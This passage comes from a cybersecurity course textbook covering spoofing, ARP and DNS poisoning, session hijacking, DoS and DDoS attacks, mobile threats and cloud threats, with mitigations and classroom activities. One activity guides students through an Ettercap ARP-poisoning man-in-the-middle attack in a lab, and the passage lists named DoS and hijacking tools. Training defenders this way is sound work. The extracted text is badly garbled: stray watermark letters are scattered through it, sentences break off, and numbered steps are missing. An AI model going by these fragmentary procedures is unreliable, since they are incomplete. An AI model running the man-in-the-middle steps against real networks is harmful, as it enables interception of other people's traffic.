malware is this file? What does quarantining a file in Windows Security do?
lic
A: Windows Security assigned this threat an alert level of Severe. The file is a virus, and Windows
Security automatically placed it in a restricted area where it can't affect the rest of the computer.
up
11.What value does this EICAR test file have in developing and testing anti-
malware systems?
N
A: Answers will vary. Though it is a bit dated, this is one method of ensuring your tool can detect
malware even when it is cloaked (for example, by being inside a ZIP file). You would usually not
want to infect your production systems with live malware, so this operates as a substitute.
o
TOPIC D
Assess the Impact of Hijacking and
Impersonation Attacks
You've considered how your systems will deal with the threat of malware attacks. Now you will
e
examine the threat of spoofing, impersonation, and hijacking.
ut
Spoofing, Impersonation, and Hijacking
ib
Spoofing, Spoofing is a software-based attack where the goal is to assume the identity of a user, process,
Impersonation, and address, or other unique identifier. An attacker uses spoofing to trick both people and computers
Hijacking into believing something incorrect about the attacker's actual identity.
tr
Impersonation is a human-based attack where an attacker pretends to be someone they are not. A
common scenario is when the attacker calls a bank customer and pretends to be calling from the
is
bank's customer service department. The attacker tells the customer they are overhauling and
augmenting their security systems, and they need the customer's online banking credentials to ensure
D
their account is adequately protected. Impersonation is often successful in situations where identity
cannot be easily established. If the customer in this example doesn't know the real customer service
representative or the customer service number, they may be less inclined to question the request.
or
Session hijacking involves exploiting a computer during an active session to obtain unauthorized
access to data, services, and networks.
e
ARP Spoofing
at
ARP Spoofing Attackers may be able to spoof IP addresses and network adapter hardware (MAC) addresses. IP
address and MAC spoofing is typically accomplished through the Address Resolution Protocol
lic
(ARP), which translates IP addresses to their corresponding physical addresses (typically a MAC
address). A table of IP addresses with their corresponding MAC addresses is cached on each
network device, and may be updated on the fly. ARP spoofing, or ARP poisoning, is when an
up
attacker redirects an IP address to a MAC address that was not its intended destination. Attackers
can execute this spoofing attack by continuously sending requests to update the cache with the
erroneous address information, and because ARP will overwrite each record with the latest request,
flooding the cache with spoofed requests will make the attack more likely to succeed.
D
ot
N
o
D
Mitigation
There are several ways you can mitigate an ARP poisoning attack, including:
• Make the ARP tables on the relevant hosts static and unchangeable without the proper
authorization. This can be difficult to manage, especially in an environment with many potential
targets.
• Create subnets. ARP packets are contained to the local subnet, so an attacker won't be able to
poison the ARP of a host on a different subnet. They will, however, still be able to poison hosts
within the subnet.
e
• Configure an intrusion detection system (IDS) to scan for anomalous ARP cache changes,
especially changes that map multiple IP addresses to the same MAC address.
ut
• Implement port security to identify and limit the MAC addresses that are allowed access to the
network port.
ib
• Configure DHCP snooping and dynamic ARP inspection on switches to map IP addresses
requested through DHCP to ARP table entries.
tr
DNS Poisoning
is
In a DNS poisoning attack, an attacker is able to modify a Domain Name System (DNS) server's DNS Poisoning (2
cache so that it returns a fraudulent IP address to its users. Instead of users navigating to the correct Slides)
D
IP address, they are directed to an IP address that serves malware or captures input from the user.
This is effective because the user doesn't necessarily see any overt signs that they've resolved to a
fraudulent address.
or
Aside from breaking into the DNS server directly and modifying the cache, attackers can exploit
DNS servers that run outdated or otherwise vulnerable software. The following process is an
example of how vulnerable DNS servers can be poisoned:
e
1. The attacker repeatedly queries a target DNS server for the address of random-
domain.google.com.
at
2. The target DNS server, not having this subdomain cached, queries authoritative DNS servers to
answer these requests.
lic
3. The authoritative server sends a response with an NS record that refers the google.com domain
to resolution via the legitimate ns1.google.com name server (3a), but the attacker beats this
response by providing the same NS record for google.com and by pointing ns1.google.com to
up
6. The malicious DNS server, which was set up to be authoritative for google.com, responds that
docs.google.com is at another IP address controlled by the attacker and which hosts a spoof
site (6a), so the user is directed to the attacker's spoof site where any credentials the user inputs
ot
e
ut
ib
tr
is
Figure 4-13: A DNS poisoning attack.
D
DNS Hijacking
In a DNS hijacking attack, an attacker modifies a computer's DNS configurations to point it
or
toward a rogue name server controlled by the attacker. Attackers can modify an end user's TCP/IP
configuration through malware, which switches the DNS server from automatic (using their ISP's
servers) to manual (the attacker's server). The attacker can then serve up more malware to the user,
such as adware and spyware, and even use social engineering tactics like pharming to steal the user's
e
credentials.
at
DHCP Spoofing
lic
DHCP Spoofing DHCP spoofing occurs when a host computer sends requests to a Dynamic Host Configuration
Protocol (DHCP) server to be assigned an IP address. The attacker, using a rogue DHCP server,
responds to this request before the actual DHCP server can. In this spoofed response, the attacker
up
usually claims that the default gateway's IP address is their own. This way, any messages sent from
the host will travel to the attacker in a man-in-the-middle attack.
To beat the legitimate DHCP server's response, the attacker can position themselves along a closer
D
path to their target. They can also initiate a DoS against the DHCP server at the right time to delay
or halt its response.
ot
DHCP servers can avoid spoofing by enabling DHCP snooping at the network switch; this feature
ensures that only certain switch ports are trusted, whereas all others are untrusted. Therefore, an
untrusted switch port can only send DHCP requests, and its responses will be ignored.
N
o
D
e
ut
ib
tr
is
Figure 4-14: An attacker spoofing a DHCP response.
D
Session Hijacking
or
Over a network like the Internet, session hijacking involves stealing an active session cookie that is
used to authenticate a user to a remote server, and then using that to control the session thereafter.
An attacker may use a fixed session ID and send that to a target. If the target enters the session
(usually under false pretenses), the attacker has access to the session. Attackers can also sniff
Session Hijacking
Example CVE IDs:
CVE-2016-2076,
CVE-2015-5346, and
e
network traffic to obtain session cookies sent over an unsecured network, like a public Wi-Fi CVE-2015-8124.
hotspot. Session cookies can also be hijacked through cross-site scripting (XSS) attacks. In this
at
technique, the attacker injects malicious code into a website, which can then execute on the client's
browser and steal the victim's session cookie.
lic
Session hijacking attacks may be used to execute DoS to either the client's system or the server
system, or in some cases, both systems. Attackers may also hijack sessions to access sensitive
information, like bank accounts or private communications.
up
Note: Another type of session hijacking involves predicting the sequence number in TCP packet
transmissions. However, this type of attack is less common.
D
The following are examples of popular tools attackers may use to hijack sessions or impersonate Hijacking and Spoofing
users and computers. Tools
N
Spoofing tools
• hping
• Nmap®
o
• Ettercap
• Nemesis
Session hijacking tools
• CookieCatcher
• DroidSheep
• CookieMonster
ACTIVITY 4-4
Assessing the Impact of Hijacking and
Impersonation Attacks
e
Before You Begin
ut
You'll be using Ettercap, a network security tool, to launch an ARP poisoning attack from Kali
Linux. You'll also be working with your Windows 10 client.
ib
Activity: Assessing the
Impact of Hijacking and Scenario
Impersonation Attacks
You have been getting numerous complaints from people connected to Develetech's guest wireless
tr
network today complaining of timeouts and slow service. You connect your analysis laptop to the
network and find that the performance is unusually bad. You'll investigate further by viewing your
is
ARP cache and monitoring Wireshark for any unusual traffic.
D
1. Display your client's ARP cache.
a) On your Windows 10 client, open a Windows PowerShell administrator prompt and enter arp -a
or
b) Verify that the ARP cache lists other hosts (by IP address) in the local network.
c) If your Kali Linux host is not listed, ping it, then reenter arp -a
e
at
lic
up
D
d) View the MAC address associated with each IP address. Notice each IP address has a different
MAC address, as expected.
e) Take note of your Kali Linux VM's MAC address.
ot
b) Open a terminal and enter sudo ettercap -G to open Ettercap in GUI mode.
o
D
c) In the ettercap 0.8.3.1 window, from the menu, select Options→Set Netmask.
e
ut
ib
d) In the ettercap Input dialog box, in the Netmask field, type 255.255.255.0 and select OK.
e) Verify the sniffing settings are as follows:
tr
is
D
or
e
at
f) Select Accept.
lic
up
j) Select your Windows 10 client from the host list, and then select Add to Target 1. Remember to help
k) Select your Windows Server 2019 server from the host list, and then select Add to Target 2. students with their IP
This selects the targets that your attack will step in the middle of as traffic is sent from one to the addresses, if necessary.
other.
e
ut
ib
tr
is
D
m) In the MITM Attack: ARP Poisoning dialog box, verify that the Sniff remote connections check box is
checked and select OK.
or
e
at
lic
up
n) In the bottom pane, verify that Ettercap is currently sniffing for traffic between these hosts.
D
ot
N
3. Communicate between client and server and view your ARP cache again.
a) Switch back to your Windows 10 client and return to a Windows PowerShell prompt.
o
d) Verify that the IP address entries for your server and the Kali Linux machine are pointing to the
same exact MAC address.
e
ut
ib
4. Confirm the spoofing attack in Wireshark.
tr
a) In your Kali Linux VM, open another terminal and enter wireshark
b) Once Wireshark opens, double-click the eth0 interface to begin capturing packets. Wireshark on the
is
c) In the Apply a display filter text box, enter arp to filter by ARP packets. Windows 10 host may
d) Switch to your Windows 10 client and ping both your server and your Kali Linux VM. not be able to capture
packets that go from the
D
e) Return to Wireshark in Kali Linux and stop the capture.
host to the VM and vice
f) Verify that ARP is telling your client that the one MAC address for your Kali Linux VM is associated versa. That's why
with both your Kali Linux IP address and your Windows Server IP address. students are using
Note: Remember that you can use the middle pane to learn more information
about a packet. For example, you can confirm the source and destination IP
o
e
7. Clean up the Kali Linux workspace.
a) Close Wireshark without saving.
ut
b) In Ettercap, select Stop MITM.
ib
tr
c) Close Ettercap.
is
D
or
e
at
lic
up
D
ot
N
o
D
TOPIC E
Assess the Impact of DoS Incidents
Throughout this lesson, you've seen how different types of attacks can lead to a denial of service. In
this topic, you'll dive deeper into the nature of DoS attacks and how attackers initiate them.
e
Denial of Service (DoS) Attack
ut
A denial of service (DoS) attack is a type of attack in which an attacker attempts to disrupt or Denial of Service (DoS)
disable systems that provide network or application services by various means, including: Attack
ib
• Flooding a network link with data to consume all available bandwidth. Example CVE IDs:
CVE-2016-5126 and
• Sending data designed to exploit known flaws in an application. CVE-2016-4454.
tr
• Sending multiple service requests to consume a system's resources.
• Flooding a user's email inbox with spam messages, causing the genuine messages to get bounced
is
back to the sender.
D
or
e
Figure 4-15: A DoS attack in which excess data floods a server, rendering it inoperable.
at
The following table describes some of the different types of DoS attacks. DoS Attack Techniques
You may also wish to
up
ICMP flood attacks are Smurf attacks and ping floods. Modern systems
and networks are usually well protected against these types of attacks.
ot
UDP flood In this attack, the attacker attempts to overwhelm the target system with
User Datagram Protocol (UDP) ping requests. Often, the source IP
address is spoofed, creating a DoS condition for the spoofed IP.
N
Buffer overflow Many systems and services are vulnerable to a buffer overflow condition,
in which too much data is fed into a fixed-length memory buffer,
resulting in adjacent areas of memory being overwritten. Attackers can
o
overflow conditions, introducing bad data into memory, thus opening the
door for any number of subsequent attack methods or simply causing the
system to cease to function or respond. A buffer overflow can also occur
when there is an excessive amount of incomplete fragmented traffic on a
network. In this case, an attacker may attempt to pass through security
systems or IDSs.
e
machines the server has communicated with. The size disparity between
the query and the response makes it easier for an attacker to flood their
ut
target with traffic, because the bandwidth they expend is much less than
the bandwidth that results.
ib
A similar technique is used in a DNS amplification attack, in which a
small query to a DNS server returns a reply up to eight times larger.
Reflection attacks can also target the Memcached service, which caches
tr
data in memory to reduce the amount of calls to databases and other
sources of data. Poorly configured Memcached servers are exposed to the
is
Internet and support UDP traffic, which does not require authentication.
The amplification factor of such traffic is greater than 50,000.
D
Resource exhaustion Resource exhaustion is a type of DoS vulnerability that occurs when an
application does not properly restrict access to requested or needed
resources. If an attacker is able to consume enough of an important
Permanent DoS
or
resource, such as network bandwidth or CPU time, the application will no
longer be able to perform its normal operations and may crash.
Permanent DoS attacks, also called phlashing, target the actual hardware
e
attack of a system to cause a service outage the victim can't easily recover from.
With a successful attack, phlashing forces the victim to repair or replace
at
Packet Generators
The previous network packet–based attack techniques are typically amplified by tools called packet
generators. Packet generators enable the attacker to craft custom network packets to carry out
specific DoS attacks or target specific services. This automates the process of sending large amounts
D
Example CAPEC ID: enables attackers to collectively exploit those computers to mount attacks. Typically, attackers use
CAPEC-125. botnets to coordinate DoS attacks, send spam email, extract personal information or passwords, and
mine for cryptocurrency. Users of these infected machines (called bots, zombies, or drones) are
o
often unaware their computers are being used for nefarious purposes.
D
DoS operations that use botnets are typically classified as distributed denial of service (DDoS)
attacks. A DDoS is a type of DoS attack that uses multiple computers on disparate networks to
launch the attack from many simultaneous sources. DDoS attacks are often much more devastating
to systems than typical DoS attacks, as even the largest and most well-defended networks can be
overwhelmed by the sheer volume and distribution of malicious traffic.
e
ut
ib
tr
is
D
or
Figure 4-16: A DDoS attack in which zombie computers in a botnet flood a server with data,
rendering it inoperable.
e
at
Mitigation
Mitigating DDoS attacks can be difficult without a great deal of bandwidth and network
redundancies. Even the largest and most well-equipped organizations cannot fully stop such attacks.
lic
However, there are some tactics that can help lessen the impact of a DDoS attack:
• Contact your ISP to see if they offer DDoS protection services. These services are also offered
up
by organizations that specialize in DDoS defense, the most popular of which is Cloudflare.
• Implement network perimeter defenses such as timing out half-open connections and lowering
the threshold at which the network drops traffic on certain protocols like ICMP. These tactics
will only slow the attack, not stop it completely.
D
become so successful at turning random Internet-connected devices into zombie computers that DDoS Countermeasures
compiling and maintaining a botnet has become a serious operation. In fact, many such operations
offer the services of their botnet to anyone willing to pay. In many cases, these prices are modest,
o
making them much more accessible. Someone with a grievance and a target can rent the botnet
without even needing any technical knowledge.
D
While load balancers and IP address filters offer rudimentary protection against a DDoS attack, the
large and distributed nature of a botnet can easily overwhelm a hardened system. Even organizations
with massive resources are susceptible to a service outage caused by a botnet, because it's incredibly
difficult to separate legitimate traffic from the malicious traffic.
Likewise, attackers can evade DDoS defenses by generating traffic in a completely legitimate and
organic manner, without even needing a botnet. Popular social media sites like Reddit and Twitter
have caused many websites to crash when someone submits a link to that site. This is called the
Slashdot effect or slashdotting, named after a social news site popular in the mid-2000s. Thousands
—and even millions—of users all flock to the website at once, which the servers can't handle. In
most cases, the person who submitted the link had no malicious intent, but a clever attacker can use
this as a cover for initiating a DDoS condition.
DoS Tools
DoS Tools The following are examples of popular tools attackers may use to initiate DoS or DDoS attacks:
e
• High Orbit Ion Cannon (HOIC)
ut
• Low Orbit Ion Cannon (LOIC)
• XOIC
ib
• OWASP HTTP Post Tool
• DDOSIM
• R-U-Dead-Yet (RUDY)
tr
• Slowloris
• PyLoris
is
• Tor's Hammer
• HTTP Unbearable Load King (HULK)
D
Note: For more information about DoS controls, visit https://www.cisco.com/c/en/us/
about/security-center/guide-ddos-defense.html.
or
e
at
lic
up
D
ot
N
o
D
ACTIVITY 4-5
Assessing the Impact of DDoS Incidents
Data File
e
C:\CNX0013Data\Analyzing Attacks on Computing and Network Environments
\DDOS_Attack.pcap
ut
Activity: Assessing the
Before You Begin Impact of DDoS
ib
Incidents
You'll use your Windows 10 client in this activity.
Scenario
tr
You get a frantic call from the Develetech web administrator telling you the site has been down
is
more than an hour, although the server itself is up and seems to be working. You see the flashing of
the switch lights and realize your server is receiving massive amounts of traffic. You plug your
analysis laptop into the switch and capture the traffic hitting the web server at 209.73.12.194. You
D
want to see if there is a pattern of DDoS activity currently hitting the web, so you'll do some
research to that effect. Detecting or not detecting a pattern could indicate the severity of the attack
on your systems.
1.
or
Examine the DDOS_Attack.pcap file containing your captured traffic of the
e
attack on your server.
at
e) Note the wide variety of IP addresses and the number of packets coming from each.
e
ut
ib
tr
is
D
This is not an actual
DDoS attack but a
simulation of one with
random addresses, so it
2. or
Is there any pattern to the attacking IP addresses?
A: No, they seem to be completely random, though there are some with numbers close together.
e
is not completely
realistic. More advanced 3. Select the TCP tab.
at
4. Close Wireshark.
up
isitdownrightnow.com
and http://
downrightnow.com.
N
o
D
e
ut
ib
tr
is
c) Scroll down the page to see more resources concerning DDoS attacks.
d) Navigate to www.downinspector.com.
D
e) In the URL text box, enter a website such as twitter.com or facebook.com
f) Now check google.com and amazon.com
g) If the site is down, note the statistics on how often and how long it has been down. If the site is up,
6.
note any recent outages in the past.
online. Others either cannot afford to or do not choose to spend the money to do that.
A: Answers may vary, but it is very difficult without simply buying lots of extra bandwidth and/or
redundant Internet connections. You may be able to consult with your ISP if it offers some sort of
DDoS protection services. You can also attempt to delay, but not fully stop, an attack by
up
incorporating network perimeter defenses like timing out half-open connections and lowering the
thresholds at which to drop certain traffic like ICMP. Ultimately, it's important to have a plan in
place in case you need to escalate your mitigation efforts to a specialist or other third party.
D
ot
N
o
D
TOPIC F
Assess the Impact of Threats to Mobile Security
In this topic, you'll take a look at how attackers target mobile devices and what sort of impact this
can have on the organization.
e
Trends in Mobile Security
ut
Trends in Mobile In many ways, mobile devices are beginning to replace traditional desktop platforms as the way in
Security which employees work. This is especially true of disciplines that require constant communication, as
ib
well as ones that involve the quick viewing of data and information. As user habits change, so too
must the organization's infrastructure. One direct consequence of the increase in mobile device
usage is the increased need for wireless infrastructure.
tr
Similarly, bring your own device (BYOD) is a phenomenon in the office workplace, and one of the
is
most significant trends in the world of mobile computing. Since mobile devices are now so integral
to everyday life, it is inevitable that employees will bring their own to supplement the devices
provided to them by their employers. Unsurprisingly, this practice introduces a whole host of
D
security issues and legal concerns into a corporate environment. Since an employee's personal
property is out of the employer's control, it is difficult to account for every risk, threat, and
vulnerability involved with these devices. Some companies have elected to outright ban BYOD to
or
prevent such security incidents; however, for a number of reasons, this isn't always feasible.
Note: Some organizations attempt to circumvent or at least offer an alternative to BYOD by
provisioning employees with phones that the organization has ultimate ownership over.
e
at
Wireless Threats
lic
Wireless Threats There are various threats to the organization's wireless network that attackers can exploit. One of
Example CVE IDs: the most direct is attempting to crack a private wireless signal. These attacks are launched in much
CVE-2017-13077, the same way as a typical online password attack: trying to brute force or run down a wordlist in
up
CVE-2017-13078, multiple attempts to log in to the network. Networks that don't implement lockout after a number
CVE-2017-13079, and of failed attempts are particularly vulnerable, not to mention those that use weak passwords or
CVE-2017-13080. outdated encryption.
Even routers that implement WPA2 can be vulnerable. In 2017, security researchers revealed a key
D
handshake, the access point sends the shared encryption key to the client, which installs it. To
address the possibility of dropped connections, the WPA2 protocol is designed to resend this key in
N
case the client does not respond. Every time the key is resent, the client reinstalls the key, and the
incremental transmit packet number (the nonce) is reset. An attacker who forces this reset can
launch a replay attack on messages that have already been encrypted using this same nonce value.
o
The attacker can therefore derive the keystream from messages with known contents that use this
nonce value. Because this is a weakness in the standard itself, all unpatched implementations are
D
vulnerable.
As mentioned before, the organization's wireless infrastructure is also at risk if it doesn't adapt.
Attackers are eager to shut down wireless networks that can't handle a certain amount of traffic load
because of poor logical and physical configurations. Likewise, a wireless network that leaks its signal
into areas outside the organization's premises is ripe for war driving attacks. Attackers will attempt
to identify weak points in the wireless network during their reconnaissance phase; when it comes
time to attack, they'll be able to focus their efforts on the most vulnerable points in the
infrastructure, increasing their effectiveness.
Attackers also frequently target wireless network clients, as they are so numerous and difficult for
security professionals to completely control. Anyone with access to the encryption key can connect
to the network automatically, and if an attacker is able to physically compromise the device, they can
use it as a vector for a much more wide-reaching assault on the network.
FragAttacks
e
Another example of threats that exploit vulnerabilities in the design of Wi-Fi are FragAttacks.
Information on these attacks was published in 2021. FragAttacks take advantage of one of three
ut
flaws:
• A flaw in the aggregation flag of a Wi-Fi frame that enables an attacker to modify this flag data
ib
with malicious data. This is called an aggregation attack.
• A flaw in the frame fragmentation feature that enables an attacker to reassemble frame fragments
that were decrypted using different keys. This is called a mixed key attack.
tr
• Another flaw in the frame fragmentation feature that enables an attacker to inject a malicious
fragment into an access point's memory cache, so that when a user connects to the network and
is
transmits fragmented frames, those fragments are reassembled along with the malicious
fragment. This is called a fragment cache attack.
D
Threats in BYOD Environments
Threat Description
or
The following table lists various threats introduced in a BYOD environment. Threats in BYOD
Environments
e
De-perimeterization With BYOD, work done while in the office may leave the office after
close of business. This pushes the boundaries farther than the
at
falling into the wrong hands. Likewise, for remote employees, the
concern shifts toward securing the interface that those employees use to
access the network.
up
Unpatched and The mobile devices employees use may be difficult to patch or be running
insecure devices outdated software, which could leave them more vulnerable to attack.
Many mobile devices also lack built-in anti-malware software. Not only
can malware infect that user's device, but it could likewise spread
D
Lost or stolen devices Unencrypted data on a phone or tablet is at risk of compromise if that
phone or tablet is lost or stolen.
D
e
• Usage of third-party apps.
ut
• Rooting of devices, enabling apps to obtain high-level privileges and
hijack the OS and other apps.
ib
Commonly, malware operates on Android devices by forcing the user's
device to initiate premium service text messaging or phone calls. The user
is unaware of this, and is charged fees based on this malicious activity.
tr
The predominant source of these threats is from unofficial application
stores rather than the official Google Play store. However, some malware
is
still makes it to Google Play, like the Judy app variants that infected
millions of devices with a browser hijack used to click on advertisements.
D
iOS® iOS is not impervious to compromise. Malware, in particular, targets
jailbroken devices that remove restrictions, particularly the restriction of
or
only being able to download apps from the official App Store.
For example, the Masque attack infected devices that installed the
malicious app through a third-party source, and the Masque app spoofed
a legitimate app's bundle identifier. This enabled the malicious app to
e
replace the legitimate one, appearing to be genuine while actually stealing
at
• AnDOSid
• Spooftooph
• DroidBox
D
• APKInspector
• AndroRAT
• Burp Suite
ot
N
o
D
ACTIVITY 4-6
Assessing the Impact of Threats to Mobile
Devices
e
Before You Begin
ut
You'll use your Windows 10 client in this activity.
Scenario
ib
Develetech employees use their own personal mobile devices for work in addition to their main Activity: Assessing the
company-issued laptops. Management has asked you to determine the security implications of this Impact of Threats to
tr
BYOD approach and whether the choice of devices should be restricted. You'll do some research Mobile Devices
on the state of mobile device threats for Android and iOS, the two most popular mobile operating
is
systems. This will help determine what is appropriate in your organization based on your security
needs.
D
1. Investigate security threats to Apple's and Google's mobile platforms.
a) In your web browser, navigate to www.cvedetails.com.
or
b) In the Search box in the upper-right corner of the page, type iphone and press Enter.
e
at
c) Scroll down past the ads and select the Apple Iphone Os : CVE security vulnerabilities link.
lic
d) Select the CVSS Scores Report link at the top of the report.
By default, the scores are shown for the past total year.
e) Examine how these vulnerabilities are scored.
up
f) Open a new tab to www.cvedetails.com, and in the Search box, enter android
g) Select the Google Android : CVE security vulnerabilities link.
h) Select the CVSS Scores Report link at the top of the report.
D
Android had more than twice as many vulnerabilities as iOS. However, iOS vulnerabilities were
more likely to be in the critical score range (9–10). The weighted average CVSS score for iPhone
vulnerabilities was also higher than Android. In past years, the report showed the opposite of
N
these conclusions, which demonstrates that mobile vulnerabilities fluctuate over time.
e
ut
ib
tr
is
Consider pointing out
that iOS doesn't offer 4. Why does the Google Play store have so many security apps?
D
many security apps, at
least not to the extent of A: Because it is an open platform, many vendors can sell their apps there. Android's openness may
the Google Play store. also be more attractive to attackers.
App Store. d) Verify that iOS has controls for code signing, app sandboxing, connection security, boot protection,
and more.
lic
variety of security apps designed by trusted vendors, but it tends to be a more widely targeted
system. Apple devices may have fewer vulnerabilities, but what vulnerabilities they do have may
be more critical. In today's world, it's not always feasible to impose hard restrictions on the types
of devices that personnel can use, depending on the industry and corporate culture. So, in many
D
cases, the best approach is to accept the risk or try to mitigate the risk using indirect methods like
training personnel on acceptable device usage, implementing a robust access control and
privilege management program across the organization, and so on.
ot
TOPIC G
Assess the Impact of Threats to Cloud Security
As more organizations are pushing their operations to the cloud, it's vital you understand how
threats could compromise those operations.
e
Cloud Infrastructure Challenges
ut
The main idea behind cloud computing is that you can access and manage your data and Cloud Infrastructure
applications from any computer, anywhere in the world, while the storage method and location are Challenges
ib
hidden or abstracted through virtualization. Because of this, customers of cloud services are
experiencing a decrease in the amount of control they have over their systems and data. Likewise,
threats that would target on-site hosting are now adjusting to target cloud providers.
tr
For example, a single cloud provider may offer services to multiple customers. This gives attackers
is
cause to target the provider, as even a minor breach can net the attacker something of value. In a
traditional infrastructure, an attacker may find intrusions to be much more difficult, as the network
can be isolated from the outside world; however, in a cloud environment, the attacker may simply
D
need to have an Internet connection and not much else to cause a breach. A lack of oversight in the
security procedures of cloud providers can dramatically increase the risk an organization takes.
or
Cloud infrastructures are also unique in that they require specialized application programming
interfaces (APIs) for third parties to interface with the cloud. These APIs can cover everything from
authentication to encryption, and if they aren't secure, attackers can easily take advantage of the
APIs to compromise the link between the customer and provider.
e
The cloud infrastructure is a boon to attackers. The elastic computing power that can be borrowed
at
through the cloud from services such as those provided by Amazon, Microsoft, and Google enable
an attacker to quickly scale their computing capabilities (to run password cracking algorithms or
stage DDoS attacks, for example) and to borrow access to resources in a way that can make their
lic
actions hard to trace. Forensic analysis can be extremely difficult in the cloud environment, since
storage and computing resources are typically virtualized. It may be difficult to pinpoint a single
server or router as the failure point. The data needed to reconstruct the incident may be scattered
up
among many devices within multiple data centers throughout the world.
Furthermore, the attacker might cobble together an attack platform from multiple vendors—such as
using cloud computing capabilities from Amazon, cloud storage from Microsoft®, and routing
communications through Google's Gmail™ service. An attacker might run different components of
D
their attack apparatus on different projects or different platforms to make it more difficult for their
activities to be detected or tracked.
ot
The following table describes some of the threats to virtualized environments often used in cloud Threats to Virtualized
infrastructures. Environments
Example CVE ID:
o
e
attacker to migrate VMs to their own machine, or migrate the VMs to a
ut
victim machine, overloading it with a DoS attack.
Data remnants Data remnants (also referred to as data remanence) are leftover
information on a storage medium even after basic attempts have been
ib
made to remove that data. Because VMs are an abstraction of a physical
environment and not the real thing, it is difficult to ensure that data you
tr
delete on the VM will truly sanitize that data from its physical source.
This is similar to the idea that simply emptying an operating system's
is
trash bin will not completely erase the data from the storage drive; an
attacker may still be able to retrieve the remaining bits before they are
overwritten.
D
For VMs, this is primarily a concern during the deprovisioning process, as
every bit of data involved in the virtual instance may not be completely
database tools to manage. Businesses are often prompted to restructure their existing architecture to
keep up with the demands of big data. This paradigm presents a challenge to security professionals
who must adapt to the massive scope of big data.
lic
Threat Description
up
Breach of privacy Big data is a solution often used to store great volumes of personal
information. Such a large store of data may make it easier for an attacker
to steal sensitive personal information in one comprehensive attack.
D
Privilege escalation Because big data can represent wide swaths of information, some users
may be able to view data they are not authorized to view. This is
ot
especially true if systems are not in place to restrict how users can view
and edit database entries. Multiple users with unrestricted visibility to data
can threaten its confidentiality.
N
Repudiation The size of big data may make event monitoring difficult or infeasible.
Without proper controls for non-repudiation, an attacker may be able to
o
e
and applications more than they would off the cloud, which makes attacks like SQL injection more
attractive to an attacker. These organizations may also be lulled into a false sense of security in the
ut
cloud, and fail to implement the proper controls against such injection attacks.
Another dimension of cloud attacks involves those attackers actually using the cloud to exploit other
ib
environments. By its very nature, the cloud is a highly distributed, instantly scalable, and powerful
set of resources. This is especially true of major services like Amazon EC2™, Google Compute
Engine™, and Microsoft Azure®, as their hosting abilities are massive. So, an attacker who can
tr
direct this power for their own malicious purposes will find their exploits even more effective than if
they relied on traditional means. Instead of slowly and unreliably infecting individual computers
is
across the world in an effort to create a botnet for DDoSing, an attacker can leverage the computing
power of the cloud to execute this DDoS more efficiently.
D
For example, consider an attacker running an automated script that signs up thousands of accounts
for a free cloud service provider in a very short time. Some providers will detect this behavior, but
other, smaller providers may be poorly equipped to do so. The attacker then creates a control
or
program that is able to direct every single account and its resources toward a single goal:
overwhelming a target with bogus traffic. Instead of coordinating a botnet made of disparate
resources stretched thin, the attacker has used the power of a single cloud service to crash their
target. But a DDoS is just one of the possible attacks that can be launched from an unwitting cloud
e
provider; malware distribution, password cracking, and other types of exploits benefit greatly from
at
Figure 4-17: An attacker exploiting free cloud services to DDoS a target server.
ACTIVITY 4-7
Assessing the Impact of Threats to Cloud
Infrastructures
e
Scenario
ut
As Develetech investigates replacing several legacy systems within the company, it is considering
migrating to various cloud services and applications. The cybersecurity team is meeting to identify
various types of new threats and challenges the company might face as they migrate to the cloud.
ib
While the team is aware that some risks can be addressed through a service-level agreement (SLA)
with cloud vendors, ultimately the risks are Develetech's, so the team is eager to anticipate any
tr
challenges that a cloud migration will bring.
Activity: Assessing the
is
Impact of Threats to
Cloud Infrastructures 1. By migrating from on-premises infrastructure to cloud services, what new
D
security risks or challenges might Develetech be exposed to?
A: Examples include: hijacking of the entire cloud account or service (for example, an attacker cracks
the password for the management console); insecure public APIs through which an attacker can
or
gain access to the company's private resources; a malicious insider at the cloud services firm
looking to harm the company or the cloud services firm; as well as the general risks associated
with moving to any web-based service (DoS, password cracking, man-in-the-middle, etc.). One of
the fundamental principles of most cloud services is leveraging economies of scale by sharing a
e
huge pool of storage and computing resources among many customers. Although there are many
benefits to this approach, it also brings a potential weakness. Any vulnerability in the cloud service
at
that enables a malicious customer of the cloud service to escape their own sandbox may enable
them to access information resources that belong to other companies. While the likelihood of this
risk might be low, its impact can be quite high, including the loss of valuable or sensitive data,
lic
service interruption for clients and the cloud provider, possible loss of reputation, legal and civil
penalties, and compliance violations.
up
with an analysis of content in specific storage media. With the cloud, forensics becomes much
more complex due to the virtual nature of storage and computing resources. For example, some
cloud vendors may distribute a single user's storage across multiple drives, multiple data centers,
or even multiple geographic regions. Establishing a chain of custody becomes difficult or
ot
impossible. As it considers each cloud service it might adopt, Develetech should model various
forensic scenarios to determine if it will be possible to obtain evidence it needs when it needs it. In
some cases, it may be necessary to build forensic capabilities into the design when customizing
N
A: The benefits of cloud services apply to attackers as well as legitimate users. For example,
D
attackers can use the big data and scalable computing tools provided by cloud services to perform
resource-intensive operations such as password cracking or DDoS attacks. Hosting services can
be used as collection points for data collected by attackers or as distribution points for malware.
Summary
In this lesson, you identified various types of threats to your computing and network environments,
such as system hacking attacks, DoS incidents, and impersonation attacks. In addition, you assessed
the impact of threats to your mobile and cloud infrastructures. After identifying the wide variety of
threats, you can then evaluate various strategies and tactics for dealing with such threats.
Encourage students to
In your experience, what types of threats has your organization or an
e
use the social
organization you're familiar with encountered? Were there strategies in place to networking tools
deal with them?
ut
provided on the CHOICE
A: Answers will vary. Most organizations have faced a wide variety of threats to their computing and Course screen to follow
up with their peers after
network systems. Recent news stories are filled with information security threats, such as identity
ib
the course is completed
theft, malware, and social engineering attacks targeted toward large organizations. Quite often,
for further discussion
strategies for dealing with the threats are developed after the threat has been revealed. and resources to support
tr
continued learning.
Has your organization or an organization you're familiar with ever been the
target of a DoS incident? What was the impact if it was preventable?
is
A: Answers will vary. Although a DoS incident isn't necessarily designed to steal information, it does
cause harm to an organization by locking up systems, consuming bandwidth and system resources,
D
and flooding mail and other services on the network. Additionally, a DoS can be used to send data
designed to exploit known flaws in an application, thus opening the door for more malicious incidents.
or
Note: Check your CHOICE Course screen for opportunities to interact with your classmates,
peers, and the larger CHOICE online community about the topics covered in this course or
other topics you are interested in. From the Course screen you can also access available
resources for a more continuous learning experience.
e
at
lic
up
D
ot
N
o
D
e
ut
Lesson Time: 3 hours
ib
tr
is
Lesson Introduction
D
After reconnaissance and attack, the last phase of the threat process is post-attack. In many
cases, an attacker won't just withdraw once their attack is done; on the contrary, they'll want
or
to stay in control of the systems they've compromised, continue to evade any
countermeasures, and cover their tracks to avoid being identified. All of this means that, if
